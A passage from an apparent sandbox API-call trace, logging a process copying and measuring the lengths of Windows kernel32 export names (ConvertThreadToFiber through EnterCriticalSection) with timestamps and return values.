lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0048.006] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0048.006] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0048.006] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0048.006] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0048.006] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0048.006] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0048.006] lstrlenA (lpString="COPYCONTEXT") returned 11 [0048.006] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0048.006] lstrlenA (lpString="COPYFILEA") returned 9 [0048.006] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0048.006] lstrlenA (lpString="COPYFILEEXA") returned 11 [0048.006] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0048.006] lstrlenA (lpString="COPYFILEEXW") returned 11 [0048.006] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0048.006] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0048.006] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0048.006] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0048.006] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0048.006] lstrlenA (lpString="COPYFILEW") returned 9 [0048.006] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0048.006] lstrlenA (lpString="COPYLZFILE") returned 10 [0048.006] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0048.006] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0048.006] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0048.006] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0048.006] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0048.007] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0048.007] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0048.007] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0048.007] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0048.007] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0048.007] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0048.007] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0048.007] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0048.007] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0048.007] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0048.007] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0048.007] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0048.007] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0048.007] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0048.007] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0048.007] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0048.007] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0048.007] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0048.007] lstrlenA (lpString="CREATEEVENTA") returned 12 [0048.007] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0048.007] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0048.007] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0048.007] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0048.007] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0048.007] lstrlenA (lpString="CREATEEVENTW") returned 12 [0048.007] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0048.007] lstrlenA (lpString="CREATEFIBER") returned 11 [0048.007] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0048.007] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0048.007] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0048.007] lstrlenA (lpString="CREATEFILEA") returned 11 [0048.007] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0048.007] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0048.007] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0048.007] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0048.007] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0048.007] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0048.008] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0048.008] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0048.008] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0048.008] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0048.008] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0048.008] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0048.008] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0048.008] lstrlenA (lpString="CREATEFILEW") returned 11 [0048.008] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0048.008] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0048.008] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0048.008] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0048.008] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0048.008] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0048.008] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0048.008] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0048.008] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0048.008] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0048.008] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0048.008] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0048.008] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0048.008] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0048.008] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0048.008] lstrlenA (lpString="CREATEJOBSET") returned 12 [0048.008] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0048.008] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0048.008] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0048.008] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0048.008] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0048.008] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0048.008] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0048.008] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0048.008] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0048.008] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0048.008] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0048.008] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0048.009] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0048.009] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0048.009] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0048.009] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0048.009] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0048.009] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0048.009] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0048.009] lstrlenA (lpString="CREATEPIPE") returned 10 [0048.009] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0048.009] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0048.009] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0048.009] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0048.009] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0048.009] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0048.009] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0048.009] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0048.009] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0048.009] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0048.009] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0048.009] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0048.009] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0048.009] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0048.009] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0048.009] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0048.009] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0048.009] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0048.009] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0048.009] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0048.009] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0048.009] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0048.009] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0048.009] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0048.009] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0048.009] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0048.009] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0048.010] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0048.010] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0048.010] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0048.010] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0048.010] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0048.010] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0048.010] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0048.010] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0048.010] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0048.010] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0048.010] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0048.010] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0048.010] lstrlenA (lpString="CREATETHREAD") returned 12 [0048.010] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0048.010] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0048.010] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0048.010] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0048.010] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0048.010] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0048.010] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0048.010] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0048.010] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0048.010] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0048.010] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0048.010] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0048.010] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0048.010] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0048.010] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0048.010] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0048.010] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0048.010] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0048.010] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0048.010] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0048.010] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0048.010] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0048.010] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0048.010] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0048.011] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0048.011] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0048.011] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0048.011] lstrlenA (lpString="CTRLROUTINE") returned 11 [0048.011] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0048.011] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0048.011] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0048.011] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0048.011] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0048.011] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0048.011] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0048.011] lstrlenA (lpString="DEBUGBREAK") returned 10 [0048.011] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0048.011] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0048.011] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0048.011] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0048.011] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0048.011] lstrlenA (lpString="DECODEPOINTER") returned 13 [0048.011] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0048.011] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0048.011] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0048.011] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0048.011] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0048.011] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0048.011] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0048.011] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0048.011] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0048.011] lstrlenA (lpString="DELETEATOM") returned 10 [0048.011] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0048.011] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0048.011] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0048.011] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0048.011] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0048.011] lstrlenA (lpString="DELETEFIBER") returned 11 [0048.011] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0048.011] lstrlenA (lpString="DELETEFILEA") returned 11 [0048.011] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0048.012] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0048.012] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0048.012] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0048.012] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0048.012] lstrlenA (lpString="DELETEFILEW") returned 11 [0048.012] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0048.012] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0048.012] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0048.012] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0048.012] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0048.012] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0048.012] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0048.012] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0048.012] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0048.012] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0048.012] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0048.012] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0048.012] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0048.012] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0048.012] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0048.012] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0048.012] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0048.012] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0048.012] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0048.012] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0048.012] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0048.012] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0048.012] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0048.012] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0048.012] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0048.012] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0048.012] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0048.012] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0048.012] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0048.012] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0048.012] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0048.013] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0048.013] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0048.013] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0048.013] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0048.013] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0048.013] lstrcpyA (in: lpString1=0xc9dc50, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0048.013] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0048.013] lstrcpyA (in: lpString1=0xc9dc50, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0048.013] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0048.013] lstrcpyA (in: lpString1=0xc9dc50, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0048.013] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0048.013] lstrcpyA (in: lpString1=0xc9dc50, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0048.013] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0048.013] lstrcpyA (in: lpString1=0xc9dc50, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0048.013] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0048.013] lstrcpyA (in: lpString1=0xc9dc50, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") 